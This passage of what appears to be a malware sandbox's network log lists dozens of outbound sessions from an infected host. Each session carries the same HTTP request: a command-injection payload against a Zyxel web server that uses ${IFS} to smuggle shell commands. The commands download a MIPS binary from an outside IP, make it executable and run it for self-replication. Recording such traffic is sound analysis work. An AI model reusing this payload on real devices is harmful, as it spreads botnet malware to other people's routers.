                                                        8120192.168.2.1436066160.181.64.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246088982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8121192.168.2.146022259.219.34.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246124029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8122192.168.2.1458662148.247.51.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246181011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8123192.168.2.1458530131.177.91.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246205091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8124192.168.2.144713286.166.107.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246279001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8125192.168.2.1442662173.52.66.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246310949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8126192.168.2.1454812177.101.88.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246345043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8127192.168.2.1437974210.190.58.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246380091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8128192.168.2.1453468175.100.197.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246409893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8129192.168.2.143311617.166.215.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246438980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8130192.168.2.1449370145.71.15.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246481895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8131192.168.2.1450130166.203.204.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246511936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8132192.168.2.145075438.210.146.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246577978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8133192.168.2.1455880143.246.87.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246588945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8134192.168.2.1441124126.101.15.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246660948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8135192.168.2.143491874.113.3.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246692896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8136192.168.2.14573504.196.13.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246737003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8137192.168.2.143289896.60.116.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246778011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8138192.168.2.143954634.66.29.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246813059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8139192.168.2.1451122192.196.34.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246859074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8140192.168.2.1442796136.205.253.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246947050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8141192.168.2.1443874196.80.154.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246970892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8142192.168.2.143839023.203.100.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246970892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8143192.168.2.144699849.76.80.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246973038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8144192.168.2.1440892129.50.111.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246973991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8145192.168.2.144187887.16.68.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.246994019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8146192.168.2.143291012.237.214.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.247045994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8147192.168.2.1449926195.250.163.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.247056961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8148192.168.2.144261049.169.101.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.247056961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8149192.168.2.1458874130.62.92.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.247165918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8150192.168.2.1451696171.69.254.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.247191906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8151192.168.2.144032634.39.13.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.247247934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8152192.168.2.145759446.120.175.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.247306108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8153192.168.2.1448992217.225.179.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.247347116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8154192.168.2.145063681.67.163.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.247409105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8155192.168.2.1434768145.108.101.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.247463942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8156192.168.2.144460837.189.51.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.247487068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8157192.168.2.145814842.100.83.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.247539043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8158192.168.2.1459098106.230.98.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.247598886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8159192.168.2.1445858189.252.76.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.247625113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8160192.168.2.1435488158.92.64.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.247677088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8161192.168.2.1443786168.80.6.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.247710943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8162192.168.2.143279283.5.168.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.247741938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8163192.168.2.144237860.84.183.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.247798920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8164192.168.2.1435370210.0.55.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.247826099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8165192.168.2.144373417.108.194.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.247905970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8166192.168.2.1445504168.89.92.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.247936010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8167192.168.2.1433514109.18.168.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.247966051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8168192.168.2.1440980147.167.136.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.248022079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8169192.168.2.1453598109.92.149.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.248058081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8170192.168.2.1445094178.176.204.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.248114109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8171192.168.2.1455840144.106.155.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.248163939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8172192.168.2.1456912172.15.17.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.248198032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8173192.168.2.1456120202.246.197.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.248250008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8174192.168.2.1448648217.123.84.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.248255968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8175192.168.2.1443958180.201.92.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.248298883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8176192.168.2.1443086212.219.18.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.248363018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8177192.168.2.145185267.36.192.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.248378038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8178192.168.2.1455238110.59.55.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.248406887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8179192.168.2.1458004156.217.107.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.248430967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8180192.168.2.143366212.67.38.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.248475075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8181192.168.2.1451124153.111.7.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.248537064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8182192.168.2.143850252.247.227.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.248584986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8183192.168.2.1454474183.6.251.233443
